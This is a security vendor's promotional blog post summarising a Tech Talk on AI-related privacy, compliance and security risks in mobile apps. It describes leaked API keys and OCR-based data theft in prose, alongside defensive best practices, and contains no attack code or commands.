App Store and Google Play visitors find it hard to escape Artificial Intelligence (AI). From photo enhancement apps to voice assistants to health diagnostics, AI commands an undeniable presence in mobile apps. In fact, 10 out of 12 top graphic design apps use AI — it’s everywhere.

As AI permeates mobile apps, it introduces a new wave of security, privacy and compliance risks that developers, security leaders and businesses must understand and address. The risk of misinformation or hallucinations or ethical bias issues stemming from AI models has long concerned companies, but now rampant AI privacy regulatory compliance, security and privacy issues threaten businesses.
NowSecure research recently discovered multiple security and privacy vulnerabilities in the iOS version of DeepSeek. Carlos Holguera, the OWASP Mobile Application Security (MAS) Project lead and a NowSecure principal research engineer, recently presented a Tech Talk about the risks AI presents in mobile apps and what steps organizations can take to reduce them.
Watch the Tech Talk, “AI in Mobile Apps: Hidden Risks, Compliance Pitfalls and How to Mitigate Them,” for a deeper understanding of AI risks and how different people in an organization would have unique concerns associated with its usage. Potential business risks include:
- Violation of data privacy laws
- Regulations and transparency requirements
- Data privacy violations and cross-border data transfer
- AI security and data leakage risks
- Liability for model outcomes
- Model theft and repackaging
- Unauthorized use of AI models and API keys
- Integrity of model outcomes and cheating risks
“Full visibility into AI dependencies, libraries and data flows is critical.”
AI Detection
The business risks outlined above stem from AI vulnerabilities such as unencrypted connections and hardcoded API keys, model theft and reverse engineering and insecure AI integrations.
In the Tech Talk, Holguera shows how NowSecure Platform automated mobile application security testing provides much-needed transparency to successfully detect interesting cases such as an app that leaks an OpenAI API key and another app that uses several services like OpenAI, Google, DeepSeek and Moonshot AI.
Holguera also discussed how the SparkCat malware uses Optical Character Recognition (OCR) to steal cryptocurrency wallet data. He demonstrated a similar case using a demo app and a “malicious” server he created, where the app acts as a regular messaging app, but behind the scenes it uses ML models with OCR to read text from user images on the app’s external storage and transmits this data over unencrypted connections, allowing an attacker to intercept sensitive information such as account recovery codes.
Best Practices for Securing AI-Powered Apps
Full visibility into AI dependencies, libraries and data flows is critical. Leaders should take the following steps to protect apps:
- Track AI Endpoints and Jurisdiction: Know which AI endpoints the app uses and where they are hosted to ensure compliance with data residency regulations.
- Identify Local Files, Models and AI Libraries: Test mobile apps for local AI models, ensuring they’re secure and tamperproof.
- Secure API Keys and Sensitive Data Transmission: Use strong encryption and secure storage practices to protect API keys and sensitive data.
- Use OWASP Standards: Test apps against the OWASP MASVS industry standard to cover all aspects of privacy, resilience, networking, cryptography, authentication, storage, and code risks beyond those associated with AI in mobile apps.
Act Against AI Risks in Your Apps
Watch the Tech Talk for deeper insight into the AI risks explored and test your apps for AI dependencies today. Next, discover how NowSecure can help you identify hidden AI integrations or hardcoded secrets and ensure compliance. Test your app today.